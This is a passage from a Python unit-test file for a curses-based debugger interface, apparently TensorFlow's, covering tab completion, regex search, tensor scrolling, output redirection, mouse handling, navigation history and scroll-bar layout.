command_sequence=[string_to_codes("c\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
ui.run_ui()
# Only the invalid command "c" should have been issued.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["ERROR: Invalid command prefix \"c\""],
ui.unwrapped_outputs[0].lines)
self.assertEqual(["ERROR: Invalid command prefix \"c\""],
ui.wrapped_outputs[0].lines[:1])
def testTabCompletionOneWordContext(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.register_tab_comp_context(["babble", "b"], ["10", "20", "30", "300"])
ui.run_ui()
self.assertEqual([["30", "300"]], ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 30, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 30, ui.wrapped_outputs[0].lines[:30])
def testTabCompletionTwice(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 1\t"), # Trigger tab completion.
string_to_codes("2\t"), # With more prefix, tab again.
string_to_codes("3\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.register_tab_comp_context(["babble", "b"], ["10", "120", "123"])
ui.run_ui()
# There should have been two different lists of candidates.
self.assertEqual([["10", "120", "123"], ["120", "123"]],
ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 123, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 123, ui.wrapped_outputs[0].lines[:123])
def testRegexSearch(self):
"""Test regex search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/a\n"), # Regex search and highlight.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The unwrapped (original) output should never have any highlighting.
self.assertEqual(3, len(ui.unwrapped_outputs))
for i in range(3):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
# The wrapped outputs should show highlighting depending on the regex.
self.assertEqual(3, len(ui.wrapped_outputs))
# The first output should have no highlighting.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
# The second output should have highlighting for "b" and "r".
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[1].font_attr_segs[i])
# The third output should have highlighting for "a" only.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(1, 2, "black_on_white")],
ui.wrapped_outputs[2].font_attr_segs[i])
def testRegexSearchContinuation(self):
"""Test continuing scrolling down to next regex match."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down: 1st time.
string_to_codes("/\n"), # Continue scrolling down: 2nd time.
string_to_codes("/\n"), # Continue scrolling down: 3rd time.
string_to_codes("/\n"), # Continue scrolling down: 4th time.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The 1st output is for the non-searched output. The other three are for
# the searched output. Even though continuation search "/" is performed
# four times, there should be only three searched outputs, because the
# last one has exceeded the end.
self.assertEqual(4, len(ui.unwrapped_outputs))
for i in range(4):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
for j in range(1, 4):
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[j].lines[:3])
self.assertEqual({
0: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
1: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
2: [(0, 1, "black_on_white"), (2, 3, "black_on_white")]
}, ui.wrapped_outputs[j].font_attr_segs)
self.assertEqual([0, 0, 1, 2], ui.output_pad_rows)
def testRegexSearchUnderLineWrapping(self):
ui = MockCursesUI(
40,
6, # Use a narrow window to trigger line wrapping
command_sequence=[
string_to_codes("babble -n 3 -l foo-bar-baz-qux\n"),
string_to_codes("/foo\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down: 1st time.
string_to_codes("/\n"), # Continue scrolling down: 2nd time.
string_to_codes("/\n"), # Continue scrolling down: 3rd time.
string_to_codes("/\n"), # Continue scrolling down: 4th time.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some")
ui.run_ui()
self.assertEqual(4, len(ui.wrapped_outputs))
for wrapped_output in ui.wrapped_outputs:
self.assertEqual(["foo-", "bar-", "baz-", "qux"] * 3,
wrapped_output.lines[0 : 12])
# The scroll location should reflect the line wrapping.
self.assertEqual([0, 0, 4, 8], ui.output_pad_rows)
def testRegexSearchNoMatchContinuation(self):
"""Test continuing scrolling when there is no regex match."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/foo\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The regex search and continuation search in the 3rd command should not
# have produced any output.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
def testRegexSearchContinuationWithoutSearch(self):
"""Test continuation scrolling when no regex search has been performed."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/\n"), # Continue scrolling without search first.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
def testRegexSearchWithInvalidRegex(self):
"""Test using invalid regex to search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/[\n"), # Continue scrolling without search first.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# Invalid regex should not have led to a new screen of output.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
# Invalid regex should have led to a toast error message.
self.assertEqual(
[MockCursesUI._UI_WAIT_MESSAGE,
"ERROR: Invalid regular expression: \"[\"",
MockCursesUI._UI_WAIT_MESSAGE],
ui.toasts)
  def testRegexSearchFromCommandHistory(self):
    """Test regex search commands are recorded in command history."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\n"),
            string_to_codes("/(b|r)\n"),  # Regex search and highlight.
            string_to_codes("babble -n 4\n"),
            [curses.KEY_UP],
            [curses.KEY_UP],
            string_to_codes("\n"),  # Hit Up twice and Enter.
            self._EXIT
        ])
    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()
    self.assertEqual(4, len(ui.wrapped_outputs))
    self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
    self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
    self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
    # "(b|r)" matches the "b" (cols 0-1) and "r" (cols 2-3) of each "bar".
    for i in range(3):
      self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
                       ui.wrapped_outputs[1].font_attr_segs[i])
    self.assertEqual(["bar"] * 4, ui.wrapped_outputs[2].lines[:4])
    self.assertEqual({}, ui.wrapped_outputs[2].font_attr_segs)
    # The regex search command loaded from history should have worked on the
    # new screen output.
    self.assertEqual(["bar"] * 4, ui.wrapped_outputs[3].lines[:4])
    for i in range(4):
      self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
                       ui.wrapped_outputs[3].font_attr_segs[i])
  def testDisplayTensorWithIndices(self):
    """Test displaying tensor with indices."""
    ui = MockCursesUI(
        9,  # Use a small screen height to cause scrolling.
        80,
        command_sequence=[
            string_to_codes("print_ones --size 5\n"),
            [curses.KEY_NPAGE],
            [curses.KEY_NPAGE],
            [curses.KEY_NPAGE],
            [curses.KEY_END],
            [curses.KEY_NPAGE],  # This PageDown goes over the bottom limit.
            [curses.KEY_PPAGE],
            [curses.KEY_PPAGE],
            [curses.KEY_PPAGE],
            [curses.KEY_HOME],
            [curses.KEY_PPAGE],  # This PageUp goes over the top limit.
            self._EXIT
        ])
    ui.register_command_handler("print_ones", self._print_ones,
                                "print an all-one matrix of specified size")
    ui.run_ui()
    # One initial screen plus one per scroll key event (incl. the two no-ops).
    self.assertEqual(11, len(ui.unwrapped_outputs))
    self.assertEqual(11, len(ui.output_array_pointer_indices))
    self.assertEqual(11, len(ui.scroll_messages))
    for i in range(11):
      self.assertEqual([
          "Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.]])"
      ], ui.unwrapped_outputs[i].lines)
    # NOTE(review): keys 0 / -1 appear to mark the array elements at the top
    # and just past the bottom of the visible screen (None when the screen
    # edge is not on an array line) -- confirm against curses_ui.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[0])
    self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[0])
    # Scrolled down one line.
    self.assertEqual({
        0: None,
        -1: [2, 0]
    }, ui.output_array_pointer_indices[1])
    self.assertIn(" Scroll (PgDn/PgUp): 16.67% -[2,0] ", ui.scroll_messages[1])
    # Scrolled down one line.
    self.assertEqual({
        0: [0, 0],
        -1: [3, 0]
    }, ui.output_array_pointer_indices[2])
    self.assertIn(" Scroll (PgDn/PgUp): 33.33% [0,0]-[3,0] ",
                  ui.scroll_messages[2])
    # Scrolled down one line.
    self.assertEqual({
        0: [1, 0],
        -1: [4, 0]
    }, ui.output_array_pointer_indices[3])
    self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
                  ui.scroll_messages[3])
    # Scroll to the bottom.
    self.assertEqual({
        0: [4, 0],
        -1: None
    }, ui.output_array_pointer_indices[4])
    self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[4])
    # Attempt to scroll beyond the bottom should lead to no change.
    self.assertEqual({
        0: [4, 0],
        -1: None
    }, ui.output_array_pointer_indices[5])
    self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[5])
    # Scrolled up one line.
    self.assertEqual({
        0: [3, 0],
        -1: None
    }, ui.output_array_pointer_indices[6])
    self.assertIn(" Scroll (PgDn/PgUp): 83.33% [3,0]- ", ui.scroll_messages[6])
    # Scrolled up one line.
    self.assertEqual({
        0: [2, 0],
        -1: None
    }, ui.output_array_pointer_indices[7])
    self.assertIn(" Scroll (PgDn/PgUp): 66.67% [2,0]- ", ui.scroll_messages[7])
    # Scrolled up one line.
    self.assertEqual({
        0: [1, 0],
        -1: [4, 0]
    }, ui.output_array_pointer_indices[8])
    self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
                  ui.scroll_messages[8])
    # Scroll to the top.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[9])
    self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[9])
    # Attempt to scroll pass the top limit should lead to no change.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[10])
    self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[10])
  def testScrollTensorByValidIndices(self):
    """Test scrolling to specified (valid) indices in a tensor."""
    ui = MockCursesUI(
        8,  # Use a small screen height to cause scrolling.
        80,
        command_sequence=[
            string_to_codes("print_ones --size 5\n"),
            string_to_codes("@[0, 0]\n"),  # Scroll to element [0, 0].
            string_to_codes("@1,0\n"),  # Scroll to element [3, 0].
            string_to_codes("@[0,2]\n"),  # Scroll back to line 0.
            self._EXIT
        ])
    ui.register_command_handler("print_ones", self._print_ones,
                                "print an all-one matrix of specified size")
    ui.run_ui()
    # One output event for the print and one per successful "@" scroll.
    self.assertEqual(4, len(ui.unwrapped_outputs))
    self.assertEqual(4, len(ui.output_array_pointer_indices))
    for i in range(4):
      self.assertEqual([
          "Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.]])"
      ], ui.unwrapped_outputs[i].lines)
    self.assertEqual({
        0: None,
        -1: [0, 0]
    }, ui.output_array_pointer_indices[0])
    self.assertEqual({
        0: [0, 0],
        -1: [2, 0]
    }, ui.output_array_pointer_indices[1])
    self.assertEqual({
        0: [1, 0],
        -1: [3, 0]
    }, ui.output_array_pointer_indices[2])
    self.assertEqual({
        0: [0, 0],
        -1: [2, 0]
    }, ui.output_array_pointer_indices[3])
  def testScrollTensorByInvalidIndices(self):
    """Test scrolling to specified invalid indices in a tensor."""
    ui = MockCursesUI(
        8,  # Use a small screen height to cause scrolling.
        80,
        command_sequence=[
            string_to_codes("print_ones --size 5\n"),
            string_to_codes("@[10, 0]\n"),  # Scroll to invalid indices.
            string_to_codes("@[]\n"),  # Scroll to invalid indices.
            string_to_codes("@\n"),  # Scroll to invalid indices.
            self._EXIT
        ])
    ui.register_command_handler("print_ones", self._print_ones,
                                "print an all-one matrix of specified size")
    ui.run_ui()
    # Because all scroll-by-indices commands are invalid, there should be only
    # one output event.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.output_array_pointer_indices))
    # Check error messages. Error toasts are interleaved with UI wait-message
    # toasts, hence the indices 2, 4 and 6.
    self.assertEqual("ERROR: Indices exceed tensor dimensions.", ui.toasts[2])
    self.assertEqual("ERROR: invalid literal for int() with base 10: ''",
                     ui.toasts[4])
    self.assertEqual("ERROR: Empty indices.", ui.toasts[6])
  def testWriteScreenOutputToFileWorks(self):
    """Redirecting a command's screen output with '>' writes it to a file."""
    # NOTE(review): tempfile.mktemp is deprecated/race-prone, but acceptable
    # in a single-process test.
    output_path = tempfile.mktemp()
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2>%s\n" % output_path),
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(1, len(ui.unwrapped_outputs))
    with gfile.Open(output_path, "r") as f:
      self.assertEqual("bar\nbar\n", f.read())
    # Clean up output file.
    gfile.Remove(output_path)
  def testIncompleteRedirectErrors(self):
    """A '>' with no target path yields an error toast and no output."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2 >\n"),
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(["ERROR: Redirect file path is empty"], ui.toasts)
    self.assertEqual(0, len(ui.unwrapped_outputs))
  def testAppendingRedirectErrors(self):
    """The appending redirect '>>' is unsupported and yields a syntax error."""
    output_path = tempfile.mktemp()
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2 >> %s\n" % output_path),
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(
        ["Syntax error for command: babble", "For help, do \"help babble\""],
        ui.unwrapped_outputs[0].lines)
    # Clean up output file.
    gfile.Remove(output_path)
  def testMouseOffTakesEffect(self):
    """'mouse off' disables mouse support and is reflected in the scroll bar."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("mouse off\n"), string_to_codes("babble\n"),
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertFalse(ui._mouse_enabled)
    self.assertIn("Mouse: OFF", ui.scroll_messages[-1])
  def testMouseOffAndOnTakeEffect(self):
    """'mouse on' after 'mouse off' re-enables mouse support."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("mouse off\n"), string_to_codes("mouse on\n"),
            string_to_codes("babble\n"), self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertTrue(ui._mouse_enabled)
    self.assertIn("Mouse: ON", ui.scroll_messages[-1])
  def testMouseClickOnLinkTriggersCommand(self):
    """Clicking a hyperlink in the output runs the linked command."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 10 -k\n"),
            [curses.KEY_MOUSE, 1, 4],  # A click on a hyperlink.
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    # First output from the typed command; second from the clicked link.
    self.assertEqual(2, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
  def testMouseClickOnLinkWithExistingTextTriggersCommand(self):
    """A link click works even with pending text in the command textbox."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 10 -k\n"),
            string_to_codes("foo"),  # Enter some existing code in the textbox.
            [curses.KEY_MOUSE, 1, 4],  # A click on a hyperlink.
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(2, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
  def testMouseClickOffLinkDoesNotTriggersCommand(self):
    """Clicking outside a hyperlink's span does not run any command."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 10 -k\n"),
            # A click off a hyperlink (too much to the right).
            [curses.KEY_MOUSE, 8, 4],
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    # The mouse click event should not have triggered any command.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
    # This command should have generated no main menus.
    self.assertEqual([None], ui.main_menu_list)
  def testMouseClickOnEnabledMenuItemWorks(self):
    """Clicking an enabled main-menu item runs its command."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 10 -m\n"),
            # A click on the enabled menu item.
            [curses.KEY_MOUSE, 3, 2],
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(2, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
    # Check the content of the menu.
    self.assertEqual(["| babble again | ahoy | "], ui.main_menu_list[0].lines)
    self.assertEqual(1, len(ui.main_menu_list[0].font_attr_segs))
    self.assertEqual(1, len(ui.main_menu_list[0].font_attr_segs[0]))
    # The "babble again" segment spans columns 2-14 and carries the menu
    # item (content "babble") plus the "underline" attribute.
    item_annot = ui.main_menu_list[0].font_attr_segs[0][0]
    self.assertEqual(2, item_annot[0])
    self.assertEqual(14, item_annot[1])
    self.assertEqual("babble", item_annot[2][0].content)
    self.assertEqual("underline", item_annot[2][1])
    # The output from the menu-triggered command does not have a menu.
    self.assertIsNone(ui.main_menu_list[1])
  def testMouseClickOnDisabledMenuItemTriggersNoCommand(self):
    """Clicking a disabled main-menu item must not run any command."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 10 -m\n"),
            # A click on the disabled menu item.
            [curses.KEY_MOUSE, 18, 1],
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    # Only the typed command produced output; the click was ignored.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
  def testNavigationUsingCommandLineWorks(self):
    """'prev' and 'next' commands navigate the screen-output history."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2\n"),
            string_to_codes("babble -n 4\n"),
            string_to_codes("prev\n"),
            string_to_codes("next\n"),
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    # Outputs: two commands, then the re-displayed previous and next screens.
    self.assertEqual(4, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[3].lines)
  def testNavigationOverOldestLimitUsingCommandLineGivesCorrectWarning(self):
    """'prev' past the oldest history entry warns and shows no new screen."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2\n"),
            string_to_codes("babble -n 4\n"),
            string_to_codes("prev\n"),
            string_to_codes("prev\n"),  # Navigate over oldest limit.
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    # The second 'prev' produced no new output event, only a warning toast.
    self.assertEqual(3, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
    self.assertEqual("At the OLDEST in navigation history!", ui.toasts[-2])
  def testNavigationOverLatestLimitUsingCommandLineGivesCorrectWarning(self):
    """'next' past the latest history entry warns and shows no new screen."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2\n"),
            string_to_codes("babble -n 4\n"),
            string_to_codes("prev\n"),
            string_to_codes("next\n"),
            string_to_codes("next\n"),  # Navigate over latest limit.
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    # The second 'next' produced no new output event, only a warning toast.
    self.assertEqual(4, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[3].lines)
    self.assertEqual("At the LATEST in navigation history!", ui.toasts[-2])
  def testMouseClicksOnNavBarWorks(self):
    """Clicking the nav bar's back/forward buttons navigates history."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2\n"),
            string_to_codes("babble -n 4\n"),
            # A click on the back (prev) button of the nav bar.
            [curses.KEY_MOUSE, 3, 1],
            # A click on the forward (next) button of the nav bar.
            [curses.KEY_MOUSE, 7, 1],
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(4, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[1].lines)
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[2].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[3].lines)
  def testMouseClicksOnNavBarAfterPreviousScrollingWorks(self):
    """History navigation restores each screen's previous scroll position."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 2\n"),
            [curses.KEY_NPAGE],  # Scroll down one line.
            string_to_codes("babble -n 4\n"),
            # A click on the back (prev) button of the nav bar.
            [curses.KEY_MOUSE, 3, 1],
            # A click on the forward (next) button of the nav bar.
            [curses.KEY_MOUSE, 7, 1],
            self._EXIT
        ])
    ui.register_command_handler("babble", self._babble, "")
    ui.run_ui()
    self.assertEqual(6, len(ui.unwrapped_outputs))
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[0].lines)
    # From manual scroll.
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[1].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[2].lines)
    # From history navigation.
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[3].lines)
    # From history navigation's auto-scroll to history scroll position.
    self.assertEqual(["bar"] * 2, ui.unwrapped_outputs[4].lines)
    self.assertEqual(["bar"] * 4, ui.unwrapped_outputs[5].lines)
    self.assertEqual(6, len(ui.scroll_messages))
    self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
    self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[1])
    self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[2])
    self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[3])
    self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[4])
    self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[5])
class ScrollBarTest(test_util.TensorFlowTestCase):
  """Unit tests for the curses_ui.ScrollBar layout and click handling."""

  def testConstructorRaisesExceptionForNotEnoughHeight(self):
    """A scroll bar shorter than the minimum height is rejected."""
    with self.assertRaisesRegexp(
        ValueError, r"Insufficient height for ScrollBar \(2\)"):
      curses_ui.ScrollBar(0, 0, 1, 1, 0, 0)

  def testLayoutIsEmptyForZeroRow(self):
    """With zero output rows there is nothing to scroll: blank layout."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 0)
    layout = scroll_bar.layout()
    self.assertEqual([" "] * 8, layout.lines)
    self.assertEqual({}, layout.font_attr_segs)

  # Fixed typo in the method name: "FoOneRow" -> "ForOneRow".
  def testLayoutIsEmptyForOneRow(self):
    """With a single output row there is nothing to scroll: blank layout."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 1)
    layout = scroll_bar.layout()
    self.assertEqual([" "] * 8, layout.lines)
    self.assertEqual({}, layout.font_attr_segs)

  def testClickCommandForOneRowIsNone(self):
    """Clicks on an empty (single-row) scroll bar map to no command."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 1)
    self.assertIsNone(scroll_bar.get_click_command(0))
    self.assertIsNone(scroll_bar.get_click_command(3))
    self.assertIsNone(scroll_bar.get_click_command(7))
    self.assertIsNone(scroll_bar.get_click_command(8))

  def testLayoutIsCorrectForTopPosition(self):
    """At the top, the block sits on row 1, right under the UP arrow."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 0, 20)
    layout = scroll_bar.layout()
    self.assertEqual(["UP"] + [" "] * 6 + ["DN"], layout.lines)
    self.assertEqual(
        {0: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
         1: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)],
         7: [(0, 2, curses_ui.ScrollBar.BASE_ATTR)]},
        layout.font_attr_segs)

  def testWidth1LayoutIsCorrectForTopPosition(self):
    """A 1-column bar abbreviates the arrows to 'U' and 'D'."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 0, 7, 0, 20)
    layout = scroll_bar.layout()
    self.assertEqual(["U"] + [" "] * 6 + ["D"], layout.lines)
    self.assertEqual(
        {0: [(0, 1, curses_ui.ScrollBar.BASE_ATTR)],
         1: [(0, 1, curses_ui.ScrollBar.BASE_ATTR)],
         7: [(0, 1, curses_ui.ScrollBar.BASE_ATTR)]},
        layout.font_attr_segs)

  def testWidth3LayoutIsCorrectForTopPosition(self):
    """A 3-column bar pads the 'UP'/'DN' labels with a trailing space."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 2, 7, 0, 20)
    layout = scroll_bar.layout()
    self.assertEqual(["UP "] + [" "] * 6 + ["DN "], layout.lines)
    self.assertEqual(
        {0: [(0, 3, curses_ui.ScrollBar.BASE_ATTR)],
         1: [(0, 3, curses_ui.ScrollBar.BASE_ATTR)],
         7: [(0, 3, curses_ui.ScrollBar.BASE_ATTR)]},
        layout.font_attr_segs)

  def testWidth4LayoutIsCorrectForTopPosition(self):
    """A 4-column bar uses ' UP ' and the full 'DOWN' label."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 3, 7, 0, 20)
    layout = scroll_bar.layout()
    self.assertEqual([" UP "] + [" "] * 6 + ["DOWN"], layout.lines)
    self.assertEqual(
        {0: [(0, 4, curses_ui.ScrollBar.BASE_ATTR)],
         1: [(0, 4, curses_ui.ScrollBar.BASE_ATTR)],
         7: [(0, 4, curses_ui.ScrollBar.BASE_ATTR)]},
        layout.font_attr_segs)

  def testLayoutIsCorrectForBottomPosition(self):
    """At the bottom, the block sits on row 6, right above the DN arrow."""
    scroll_bar = curses_ui.ScrollBar(0, 0, 1, 7, 19, 20)
    layout = scroll_bar.layout()
    self.assertEqual(["UP"] + [" "] * 6 + ["DN"], layout.lines)
    self.assertEqual(
